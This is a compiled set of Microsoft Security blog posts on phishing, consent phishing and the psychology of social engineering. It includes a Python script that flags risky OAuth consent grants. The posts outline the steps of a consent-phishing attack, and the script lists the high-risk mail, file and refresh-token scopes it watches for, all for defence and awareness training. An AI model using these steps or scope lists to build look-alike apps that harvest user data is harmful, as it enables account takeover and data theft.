According to Accenture’s Ninth Annual Cost of Cybercrime Study, phishing attacks cost the average organization USD1.4 million in 2018, an eight percent rise over 2017. This likely underestimates the cost because the report only considers four major consequences when determining the cost of an attack: business disruption, information loss, revenue loss, and equipment damage. However, phishing is used as the delivery method for several other attacks, including business email compromise, malware, ransomware, and botnet attacks. The 2019 Verizon Data Breach Report finds that almost one in three attacks involved phishing. And according to the 2019 Internet Crime Complaint Center, phishing/vishing/smishing/pharming are the most common methods for scamming individuals online.

Since the costs of other attacks can often be attributed to phishing, a comprehensive cyber risk mitigation strategy should place a high value on phishing defenses and user education.

Phishing campaigns can be well-targeted and sophisticated

As attackers have developed new methods to evade detection by defenders and victims, phishing has transformed. Phishing now uses mediums other than email, including voicemail, instant messaging, and collaboration platforms, because people have enhanced email-based defenses but may not have considered these other attack vectors. The success of phishing as the delivery mechanism for other cyberattacks makes it critically important for defenders to be able to identify the many types of phishing and how to defend against them, including:

  • Mass market phishing: When you think of phishing, this is likely what comes to mind. These emails go out to a large group of people and use a generic message to trick users into clicking a link or downloading a file. Attacks often use email spoofing, so that the message appears to come from a legitimate source.
  • Spear phishing: Spear phishing is a more targeted social engineering method. Attackers pick an individual, such as a global administrator or an HR professional, conduct research, and then craft an email that makes use of that research to dupe the victim.
  • Whaling: These emails target someone on the executive team. Like spear phishing, these attacks start with research, which the attacker uses to write an email that appears legitimate.
  • Business email compromise: In these attacks, adversaries compromise an executive’s account, such as the CEO’s, and then use that account to ask a direct report to wire money.
  • Clone phishing: Attackers clone a legitimate email and then change the link or attachment.
  • Vishing: Vishing is a phishing attempt using the phone. Victims are asked to call back and enter a PIN or account number.

Fahmida Y. Rashid provides more details about these types of phishing attacks on CSO.

An emerging phishing method exploits the increase in remote work

Recently, another phishing type was identified called consent phishing. In response to COVID-19, people have increased their usage of cloud apps and mobile devices to facilitate work from home. Bad actors have taken advantage of this shift by leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. By using application prompts similar to those on mobile devices, they trick victims into granting malicious applications permission to access services and data (see Figure 1).


Figure 1: Familiar application prompts trick users into giving malicious apps access to services and data.

The following best practices can help you defend against this new threat:

  • Educate your organization on how to identify a consent phishing message. Poor spelling and grammar are two indicators that the request isn’t legitimate. Users may also notice that the URL doesn’t quite look right.
  • Promote and allow access to apps you trust. Use publisher verified to identify apps that have been validated by the Microsoft platform. Configure application consent policies, so employees are guided to applications you trust.
  • Educate your organization on how the permissions and consent framework works in the Microsoft platform.

Office 365 Advanced Threat Protection helps prevent and remediate phishing attacks

Office 365 Advanced Threat Protection (Office 365 ATP) natively protects all of Office 365 against advanced attacks. The service leverages industry-leading intelligence fueled by trillions of signals to continuously evolve to prevent emerging threats, like phishing and impersonation attacks. As part of Microsoft Threat Protection, Office 365 ATP provides security teams with the tools to investigate and remediate these threats, and integrates with other Microsoft Threat Protection products like Microsoft Defender Advanced Threat Protection and Azure Advanced Threat Protection to help stop cross-domain attacks spanning email, collaboration tools, endpoints, identities, and cloud apps.

Microsoft Threat Protection increases analyst efficiency

Microsoft Threat Protection stops attacks across Microsoft 365 services and auto-heals affected assets. It leverages the Microsoft 365 security portfolio to automatically analyze threat data across identities, endpoints, cloud applications, and email and docs. By fusing related alerts into incidents, defenders can respond to threats and attacks immediately and in their entirety, saving precious time (see Figure 2).

The following actions will help you gain greater visibility into attacks to protect your organization.


Figure 2: Microsoft Threat Protection and Office 365 ATP provide several capabilities to help you protect your organization from phishing attacks.


How to detect and mitigate phishing risks with Microsoft and Terranova Security

August 25th, 2020

Detect, assess, and remediate phishing risks across your organization

A successful phishing attack requires just one person to take the bait. That’s why so many organizations fall victim to these cyber threats. To reduce this human risk, you need a combination of smart technology and people-centric security awareness training. But if you don’t understand your vulnerabilities, it can be difficult to know where to start. Attack simulation training capabilities in Office 365 Advanced Threat Protection (Office 365 ATP) empower you to detect, assess, and remediate phishing risk through an integrated phish simulation and training experience. And, in October 2020, you can get true phishing clickthrough benchmarks when you register for the Terranova Security Gone Phishing Tournament™.

Terranova Security is a global leader in cybersecurity awareness training that draws on principles of behavioral science to create training content that changes user behavior. Through a partnership with Microsoft, Terranova Security is able to enrich our training programs with insights from the Microsoft platform, while Microsoft leverages our content and technology in Microsoft Office 365 Advanced Threat Protection (Office 365 ATP).

Today’s blog shares how the Gone Phishing Tournament helps you baseline against your industry and peers, and how Office 365 ATP Attack Simulation training can help you mitigate the risk of a phishing-related data breach.

How does your risk of being phished stack up?

Cybercriminals exploit human psychology to trick users, which is why they introduced COVID-19-themed phishing lures in the early days of the pandemic. Many employees are working from home for the first time and have children and other family members competing for their attention. Bad actors hope to trick employees when they are busy and stressed. Although it’s understandable why people accidentally act on phishing campaigns, there is an opportunity to turn your employees into your first line of defense. When people understand how phishing campaigns work, your organization is more secure.

An image showing typical malware campaigns before and after.


The Gone Phishing Tournament will give you valuable insight into how well employees understand phishing. The Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October. The tournament leverages a phishing email based on real-world threats provided by Attack simulation training in Office 365 ATP and localizes it for your audience. After you register, you can select the users you want to include in the phishing simulation. We run the simulation for a set number of days using the same template, so you get an accurate assessment of how you compare to peer organizations. At the end of the tournament, you’ll receive a personalized click report and a global benchmarking report.

Empower employees to defend against phishing threats

Phishing simulations are a great way to educate employees about phishing threats, but to shift behavior you need a regular program that includes targeted education alongside simulations. Terranova Security’s awareness training, which will soon be available in Office 365 ATP, takes a pedagogical approach with gamification and interactive sessions designed to engage adults. It is localized for employees around the world and complies with the Web Content Accessibility Guidelines (WCAG) 2.0.

Later this year, Office 365 ATP Attack Simulator and Training will launch integrated with Terranova Security awareness training. You’ll be able to take advantage of comprehensive training benefits that will help you measure behavior change and automate design and deployment of an integrated security awareness training program:

  • Simulate real threats: Detect vulnerabilities with real lures and templates for accurate risk assessment. By automatically or manually sending employees the same emails that attackers have used against your organization, you can uncover risk. Then, target users who fall for phish with personalized training content that helps them connect what they learned with real-world campaigns.
  • Remediate intelligently: Quantify social engineering risk across your employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impact of training. Using user susceptibility metrics, you can trigger automated repeat offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human firewall with hyper-targeted training designed to change employee behavior. Training can be customized and localized to meet the diverse needs of employees. Tailor simulations to your employees’ contexts (region, industry, function) with granular conditionality on harvesting. You can also cater to diverse learning styles and reinforce awareness with interactive nano learning and microlearning content.

In the new world of remote work, it has become clear that your people are your perimeter. Attack simulation training in Office 365 ATP, delivered in partnership with Terranova Security, can help you identify vulnerable users and deliver targeted, engaging education that empowers them to defend against the latest phishing threats. Look for a future blog from me at the beginning of Cybersecurity Awareness Month that will discuss in more detail how to train your employees on security. In the meantime, register for the Terranova Security Gone Phishing Tournament October 2020.


Afternoon Cyber Tea: Revisiting social engineering: The human threat to cybersecurity

August 5th, 2020

Most of us know ‘Improv’ through film, theatre, music or even live comedy. It may surprise you to learn that the skills required for improvisational performance art can also make you a good hacker. In cybersecurity, while quite a bit of focus is on the technology that our adversaries use, we must not forget that most cybersecurity attacks start with a non-technical, social engineering campaign, and they can be incredibly sophisticated. It is how attackers were able to pivot quickly and leverage COVID-themed lures to wreak havoc during the onset of the global pandemic. To dig into how social attacks like these are executed, and why they work time and again, I spoke with Rachel Tobac on a recent episode of Afternoon Cyber Tea with Ann Johnson.

Rachel Tobac is the CEO of SocialProof Security and a white-hat hacker, who advises organizations on how to harden their defenses against social engineering. Her study of neuroscience and Improv have given her deep insight into how bad actors use social psychology to convince people to break policy. I really appreciate how she is able to break down the steps in a typical social engineering campaign to illustrate how people get tricked.

In our conversation, we also talked about why not all social engineering campaigns feel “phishy.” Hackers are so good at doing research and building rapport that the interaction often feels legitimate to their targets. However, there are techniques you can use, like multi-factor authentication and two-factor communication, to reduce your risk. We also discussed emerging threats, like deep fake videos, attacks on critical infrastructure, and how social engineering techniques could be used against driverless cars. To learn why you should take social engineering seriously and how to protect your organization, listen to Afternoon Cyber Tea with Ann Johnson: Revisiting social engineering: The human threat to cybersecurity on Apple Podcasts or Podcast One.

What’s next

In this important cyber series, I talk with cybersecurity influencers about trends shaping the threat landscape and explore the risk and promise of systems powered by AI, Internet of Things (IoT), and other emerging tech.

You can listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts — You can also download the episode by clicking the Episode Website link.
  • Podcast One — Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page — Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

To find out more information on Microsoft Security Solutions visit our website. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.


Protecting your remote workforce from application-based attacks like consent phishing

July 8th, 2020

The global pandemic has dramatically shifted how people work. As a result, organizations around the world have scaled up cloud services to support collaboration and productivity from home. We’re also seeing more apps leverage Microsoft’s identity platform to ensure seamless access and integrated security as cloud app usage explodes, particularly in collaboration apps such as Zoom, Webex Teams, Box and Microsoft Teams. With increased cloud app usage and the shift to working from home, security and how employees access company resources are even more top of mind for companies.

While application use has accelerated and enabled employees to be productive remotely, attackers are looking at leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. While you may be familiar with attacks focused on users, such as email phishing or credential compromise, application-based attacks, such as consent phishing, are another threat vector you must be aware of. Today we wanted to share one of the ways application-based attacks can target the valuable data your organization cares about, and what you can do today to stay safe.

Consent phishing: An application-based threat to keep an eye on

Today developers are building apps by integrating user and organizational data from cloud platforms to enhance and personalize their experiences. These cloud platforms are rich in data but in turn have attracted malicious actors seeking to gain unwarranted access to this data. One such attack is consent phishing, where attackers trick users into granting a malicious app access to sensitive data or other resources. Instead of trying to steal the user’s password, an attacker is seeking permission for an attacker-controlled app to access valuable data.

While each attack tends to vary, the core steps usually look something like this:

  1. An attacker registers an app with an OAuth 2.0 provider, such as Azure Active Directory.
  2. The app is configured in a way that makes it seem trustworthy, like using the name of a popular product used in the same ecosystem.
  3. The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or other techniques.
  4. The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
  5. If a user clicks accept, they will grant the app permissions to access sensitive data.
  6. The app gets an authorization code which it redeems for an access token, and potentially a refresh token.
  7. The access token is used to make API calls on behalf of the user.

If the user accepts, the attacker can gain access to their mail, forwarding rules, files, contacts, notes, profile and other sensitive data and resources.


Consent screen from a sample malicious app named “Risky App”

How to protect your organization

At Microsoft, our integrated security solutions from identity and access management, device management, threat protection and cloud security enable us to evaluate and monitor trillions of signals to help identify malicious apps. From our signals, we’ve been able to identify and take measures to remediate malicious apps by disabling them and preventing users from accessing them. In some instances, we’ve also taken legal action to further protect our customers.

We’re also continuing to invest in ways to ensure our application ecosystem is secure by enabling customers to set policies on the types of apps users can consent to as well as highlighting apps that come from trusted publishers. While attackers will always persist, there are steps you can take to further protect your organization. Some best practices to follow include:

  • Educate your organization on consent phishing tactics:
    • Check for poor spelling and grammar. If an email message or the application’s consent screen has spelling and grammatical errors, it’s likely to be a suspicious application.
    • Keep a watchful eye on app names and domain URLs. Attackers like to spoof app names that make it appear to come from legitimate applications or companies but drive you to consent to a malicious app. Make sure you recognize the app name and domain URL before consenting to an application.
  • Promote and allow access to apps you trust:
    • Promote the use of applications that have been publisher verified. Publisher verification helps admins and end-users understand the authenticity of application developers. Over 660 applications by 390 publishers have been verified thus far.
    • Configure application consent policies by allowing users to only consent to specific applications you trust, such as applications developed by your organization or from verified publishers.
  • Educate your organization on how our permissions and consent framework works:

The increased use of cloud applications has demonstrated the need to improve application security. At Microsoft, we’re committed to building capabilities that proactively protect you from malicious apps while giving you the tools to set policies that balance security and productivity. For additional best practices and safeguards review the Detect and Remediate Illicit Consent Grants in Office 365 and Five steps to securing your identity infrastructure.
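The review step referenced above (finding illicit consent grants after the fact) can be scripted. The following is an added example, not Microsoft's code: it triages a list of OAuth2 consent-grant records (constructed here, with an assumed, simplified field layout) for the combination the post describes: a broad data scope, granted by an ordinary user, to an unverified app whose name imitates a product the organization already trusts. Scope names follow Microsoft Graph delegated permission names; the trusted-product list and app ids are constructed.

```python
"""Triage OAuth2 consent grants for consent-phishing indicators (added example)."""
from dataclasses import dataclass
import re

# Scopes that give an app the access the post lists as the payoff of consent
# phishing: mail, forwarding rules (mailbox settings), files, contacts, notes,
# plus offline_access, which yields a long-lived refresh token.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.Read.All", "Files.ReadWrite.All", "Contacts.Read", "Notes.Read.All",
    "offline_access",
}

# Product names the organization already uses (constructed list). An
# unverified app that borrows one of these is treated as a look-alike.
TRUSTED_PRODUCT_NAMES = {"Microsoft", "Office 365", "Teams", "Zoom", "Box"}

REVIEW_THRESHOLD = 3  # scores at or above this go to an analyst


@dataclass(frozen=True)
class ConsentGrant:
    app_name: str
    app_id: str            # client (application) id; constructed values below
    publisher_verified: bool
    consent_type: str      # "Principal" = a user consented for themselves;
                           # "AllPrincipals" = admin consent for the tenant
    granted_by: str
    scopes: tuple


def _normalize(name: str) -> str:
    """Lower-case and collapse punctuation so 'Micro-soft Teams!' matches."""
    return re.sub(r"[^a-z0-9]+", " ", name.lower()).strip()


def looks_like_impersonation(grant: ConsentGrant) -> bool:
    """True if an unverified app's name contains a trusted product name (whole words)."""
    if grant.publisher_verified:
        return False
    padded = f" {_normalize(grant.app_name)} "
    return any(f" {_normalize(p)} " in padded for p in TRUSTED_PRODUCT_NAMES)


def risky_scopes(grant: ConsentGrant) -> set:
    return set(grant.scopes) & HIGH_RISK_SCOPES


def score_grant(grant: ConsentGrant):
    """Return (score, reasons). Higher is worse."""
    score, reasons = 0, []
    bad = risky_scopes(grant)
    if bad:
        score += 2
        reasons.append("high-risk scopes: " + ", ".join(sorted(bad)))
    if not grant.publisher_verified:
        score += 1
        reasons.append("publisher not verified")
    if looks_like_impersonation(grant):
        score += 2
        reasons.append("app name imitates a trusted product")
    if bad and grant.consent_type == "Principal":
        score += 1
        reasons.append("broad scope granted by end-user consent, not admin")
    return score, reasons


def triage(grants):
    """Return [(score, grant, reasons)] for grants needing review, worst first."""
    flagged = [(s, g, r) for g in grants for s, r in [score_grant(g)]
               if s >= REVIEW_THRESHOLD]
    flagged.sort(key=lambda t: -t[0])
    return flagged


# Constructed sample: a verified, admin-consented app, a look-alike that asked
# for mail and mailbox-settings access via user consent, and a harmless app.
SAMPLE_GRANTS = [
    ConsentGrant("Microsoft Teams", "00000000-0000-0000-0000-000000000001",
                 True, "AllPrincipals", "admin@example.com",
                 ("User.Read", "Files.Read.All")),
    ConsentGrant("Microsoft Teams Update", "00000000-0000-0000-0000-0000000000bb",
                 False, "Principal", "alice@example.com",
                 ("User.Read", "Mail.ReadWrite", "MailboxSettings.ReadWrite",
                  "offline_access")),
    ConsentGrant("Expense Helper", "00000000-0000-0000-0000-0000000000cc",
                 False, "Principal", "bob@example.com", ("User.Read",)),
]

if __name__ == "__main__":
    for score, g, reasons in triage(SAMPLE_GRANTS):
        print(f"[{score}] {g.app_name} ({g.app_id}) granted by {g.granted_by}")
        for r in reasons:
            print("    -", r)
```

Flagged grants are candidates for revoking the grant and disabling the app, the remediation the post points to; a verified app with admin consent scores below the threshold even when it holds a broad scope.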


The psychology of social engineering—the “soft” side of cybercrime

June 30th, 2020

Forty-eight percent of people will exchange their password for a piece of chocolate,[1] 91 percent of cyberattacks begin with a simple phish,[2] and two out of three people have experienced a tech support scam in the past 12 months.[3] What do all of these have in common? They make use of social engineering: when an attacker preys on our human nature in order to defraud. Also in common, these small, very human actions have led to billions of dollars of loss to global business.

People are by nature social. Our decision making is highly influenced by others. We are also overloaded with information and look to shortcuts to save time. This is why social engineering is so effective. In this blog, I’ll share the psychology behind Cialdini’s Six Principles of Persuasion to show how they help lure employees and customers into social engineering hacks. And I’ll provide some tips for using those principles to create a social engineering resistant culture.

Dr. Robert Cialdini is Regents’ Professor Emeritus of Psychology and Marketing at Arizona State University and founder of Influence at Work. He has spent his entire career studying what makes people say “Yes” to requests. From that research he developed Six Principles of Persuasion: Reciprocity, Scarcity, Authority, Consistency, Liking, and Consensus. So let’s take a look at how each of these principles is used in social engineering campaigns and how you can turn them around for good.

Reciprocity

People are inclined to be fair. In fact, receiving a gift triggers a neurological response in the areas of the brain associated with decision-making. If my friend buys me lunch on Friday, I will feel obliged to buy her lunch the next time we go out. Social psychologists have shown that if people receive a holiday card from a stranger, 20 percent will send one back.[4] And providing a mint at the end of a meal can increase tipping by 18-21 percent.

How reciprocity is used in phishing: You can see evidence of the Principle of Reciprocity in phishing campaigns and other scams. For example, an attacker may send an email that includes a free coupon and then ask the user to sign up for an account.

Leveraging reciprocity to reduce phishing: According to Dr. Cialdini, the lesson of “the Principle of Reciprocity is to be the first to give...” Many organizations pay for lunch to get people to come to trainings, but you may also consider giving away gift certificates for coffee or a fun T-shirt. If the gift is personal and unexpected, it’s even more effective. After you give, ask people to commit to your security principles. Many will feel compelled to do so.

Scarcity

Why do so many travel websites tell you when there are only a few remaining flights or rooms? The Principle of Scarcity. It’s human nature to place a higher value on something that is in limited supply. In one experiment, college students judged cookies more appealing if there were fewer in the jar.[5] Even more appealing? When an abundant supply of cookies was later reduced to scarcity.

How scarcity is used in phishing: Attackers take advantage of our desire for things that seem scarce by putting time limits on offers in emails. Or, in another common tactic, they tell people that their account will deactivate in 24 hours if they don’t click on a link to get it resolved.

Leveraging scarcity to reduce phishing: You can leverage scarcity to engage people in security behaviors too. For example, consider giving a prize to the first 100 people who enable multi-factor authentication.

Authority

People tend to follow the lead of credible experts. Doctors (think Dr. Fauci), teachers, bosses, and political leaders, among others, have huge sway over people’s actions and behaviors. If you’ve heard of the Milgram study,[6] you may be familiar with this concept. In that study an experimenter convinced volunteers to deliver increasingly more severe shocks to a “learner” who didn’t answer questions correctly. Fortunately, the learner was an actor who pretended to feel pain, when in reality there were no shocks delivered. However, it does show you how powerful the Principle of Authority is.

How authority is used in phishing: Using authority figures to trick users is very common and quite effective. Bad actors spoof the Chief Executive Officer (CEO) to demand that the Chief Financial Officer (CFO) wire money quickly in some spear phishing campaigns. When combined with urgency, people are often afraid to say no to their boss.

Leveraging authority to reduce phishing: You can use people’s natural trust of authority figures in your security program. For example, have senior managers make a statement about how important security is.

Consistency

Most people value integrity. We admire honesty and reliability in others, and we try to practice it in our own lives. This is what drives the Principle of Consistency. People are motivated to remain consistent with prior statements or actions. If I tell you that I value the outdoors, I won’t want to be caught throwing litter in a park. One study found that if you ask people to commit to environmentally friendly behavior when they check into a hotel, they will be 25 percent more likely to reuse their towel.[7]

How consistency is used in phishing: Scammers take advantage of people’s desire to be consistent by asking for something small in an initial email and then asking for more later.

Leveraging consistency to reduce phishing: One way to employ the Principle of Consistency in your security program is to ask staff to commit to security. Even more powerful? Have them do it in writing.

Liking

It probably won’t surprise you to learn that people are more likely to say yes to someone they like. If a friend asks for help, I want to say yes, but it’s easier to say no to a stranger. Even a stranger can be persuasive, though, if they are perceived as nice. In the raffle experiment, people were more likely to buy raffle tickets if the person selling the tickets brought them a soda, and less likely if the person only bought themselves a soda.[8]

How liking is used in phishing: When bad actors spoof or hack an individual’s email account and then send a phishing email to that person’s contacts, they are using the Principle of Liking. They are hoping that one of the hacking victim’s friends won’t spend much time scrutinizing the email content and will just act because they like the “sender.”

Leveraging liking to reduce phishing: To be more persuasive with your staff, cultivate an “internal consulting” mindset. Be friendly and build relationships, so that people want to say yes when you ask them to change their behavior.

Consensus

When people are uncertain, they look to others to help them formulate an opinion. Even when they are confident of their beliefs, consensus opinions can be very persuasive. This can be seen in the light dot experiment. In this study, individuals were asked how much a (stationary) dot of light was moving; it appeared to move due to the autokinetic effect. Days later, the subjects were divided into groups. Despite very different earlier estimates, responses “normalized” to the broader group. When brought back to provide an individual estimate, individuals continued to give the group estimate.[9]

How consensus is used in phishing: Adversaries exploit cultural trends. For example, when there is a natural disaster, there are often several illegitimate organizations posing as a charity to elicit donations.

Leveraging consensus to reduce phishing: Highlight positive security behaviors among other employees or report favorable statistics that indicate most people are complying with a security policy.

The more complex life becomes, the more likely humans will rely on cognitive shortcuts to make decisions. Educate your employees on how Cialdini’s Six Principles of Persuasion can be used to trick them. Try implementing the principles in your own communication and training programs to improve compliance. Over time, you can build a culture that is less likely to fall for social engineering campaigns.

Watch “The psychology of social engineering: the soft side of cybercrime” presentation at InfoSec World v2020.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter.

[1] Happ, C.; Melzer, A.; Steffgen, G. “Trick with treat – Reciprocity increases the willingness to communicate personal data.” https://dl.acm.org/citation.cfm?id=2950731
[2] PhishMe (2016). “2016 Enterprise Phishing Susceptibility and Resiliency Report.” https://phishme.com/enterprise-phishing-susceptibility-report
[3] Microsoft (2016). “Microsoft Global Survey on Tech Support Scams.” https://mscorpmedia.azureedge.net/mscorpmedia/2016/10/Microsoft_Infographic_final.pdf
[4] Kunz, Phillip R.; Woolcott, Michael (1976-09-01). “Season’s greetings: From my status to yours.” Social Science Research. 5 (3): 269–278.
[5] Worchel, Stephen; Lee, Jerry; Adewole, Akanbi (1975). “Effects of supply and demand on ratings of object value.” Journal of Personality and Social Psychology. 32 (5): 906–914.
[6] Milgram, Stanley (1963). “Behavioral Study of Obedience.” Journal of Abnormal and Social Psychology. 67 (4): 371–378.
[7] Baca-Motes, Katie; Brown, Amber; Gneezy, Ayelet; Keenan, Elizabeth A.; Nelson, Leif D. (2013-02-01). “Commitment and Behavior Change: Evidence from the Field.” Journal of Consumer Research. 39 (5): 1070–1084.
[8] Regan, Dennis T. (1971-11-01). “Effects of a favor and liking on compliance.” Journal of Experimental Social Psychology. 7 (6): 627–639.
[9] Sherif, M. (1935). “A study of some social factors in perception.” Archives of Psychology. 27: 187.

The post The psychology of social engineering—the “soft” side of cybercrime appeared first on Microsoft Security.